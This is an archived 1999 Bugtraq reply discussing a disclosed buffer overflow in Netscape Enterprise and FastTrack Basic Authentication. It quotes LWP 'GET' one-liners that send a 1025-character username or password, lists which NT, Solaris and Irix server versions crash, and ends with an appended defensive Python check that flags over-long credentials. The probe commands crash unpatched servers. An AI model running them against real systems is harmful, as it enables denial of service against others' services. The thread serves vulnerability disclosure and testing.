[12845] in bugtraq


Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise

daemon@ATHENA.MIT.EDU (Brock Sides)
Fri Dec 3 18:43:24 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.21.9912031516550.12451-100000@koala.towery.com>
Date:         Fri, 3 Dec 1999 15:38:04 -0600
Reply-To: Brock Sides <bsides@TOWERY.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To:         Doug Monroe <monwel@INTERHACK.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <3.0.3.32.19991202131732.006a39cc@postoffice.worldnet.att.net>

Some more data. Using LWP's "GET" as follows:

$ GET -C `perl -e 'print "A"x1025'`:password http://hostname:port

Netscape FastTrack 3.0.1 on NT: crashes
Admin Server 3.5 on NT: crashes
Netscape FastTrack 3.0.2 on Irix 6.x: no problem
Admin Server 3.5 on Irix 6.x: no problem
Netscape Enterprise 3.6sp2 on Irix 6.x: no problem

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com

On Thu, 2 Dec 1999, Doug Monroe wrote:

> RE:
> > ISS Security Advisory
> > December 1, 1999
> > Buffer Overflow in Netscape Enterprise and FastTrack Authentication
> > Procedure
>
> I made a few simple pokes with variants of perl LWP's 'GET' function at
> areas of 2 NES 3.x servers that are protected with Basic Authentication.
> For example-
> $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
> $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
>
> Solaris 2.6/NES 3.5.1 (and 3.6.3)-
>  username:LONGpw -> http://server/private-path - NO KILL
>  LONGusername:pw -> http://server/private-path - NO KILL
>
> NT4/SP4/NES 3.6.2-
>  username:LONGpw -> http://server/private-path - NO KILL
>  LONGusername:pw -> http://server/private-path - KILL
>
> Potentially important diffs/notes:
> On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
> ACL.
> On the NT, the private area was protected using local-db ACL, not NCSA-style.
> I have not tried poking a local-db/LDIF protected area on Solaris.
> I have not tried poking a .nsconfig/NCSA-style area on NT.
> I have not tried poking at the admin server of either box.
> --
> Doug Monroe
> www.interhack.net
>
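
A defender-side check for the condition this thread probes, added here as an example and not code from either post: it decodes the Basic Authorization header of an HTTP request and flags a username or password longer than 1024 characters (the 1025-character value used in both posts). The request builder, the header layout and the threshold constant are assumptions for illustration.

```python
import base64
import binascii

# Threshold taken from the thread: 1025-character usernames crashed the NT servers.
MAX_CREDENTIAL_LEN = 1024


def parse_basic_auth(header_value):
    """Decode 'Basic <base64>' into (user, password); None if malformed."""
    scheme, _, blob = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not blob:
        return None
    try:
        decoded = base64.b64decode(blob.strip(), validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None
    if ":" not in decoded:          # RFC 7617 requires a colon separator
        return None
    user, _, pw = decoded.partition(":")   # password may itself contain ':'
    return user, pw


def check_request(raw_request, limit=MAX_CREDENTIAL_LEN):
    """Report credential lengths from the first Basic Authorization header.

    Returns a dict with 'user_len', 'pw_len' and a 'suspicious' flag set when
    either field exceeds `limit`; None if no decodable Basic header is present.
    """
    for line in raw_request.split("\r\n"):
        name, _, value = line.partition(":")
        if name.strip().lower() == "authorization":
            creds = parse_basic_auth(value)
            if creds is None:
                return None
            user, pw = creds
            return {"user_len": len(user), "pw_len": len(pw),
                    "suspicious": len(user) > limit or len(pw) > limit}
    return None


def make_request(user, pw):
    """Constructed sample request, shaped like what LWP's 'GET -C user:pw' sends."""
    token = base64.b64encode(f"{user}:{pw}".encode("latin-1")).decode("ascii")
    return ("GET /private-path HTTP/1.0\r\nHost: server\r\n"
            f"Authorization: Basic {token}\r\n\r\n")


if __name__ == "__main__":
    for u, p in (("username", "password"), ("A" * 1025, "password")):
        print(check_request(make_request(u, p)))
```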
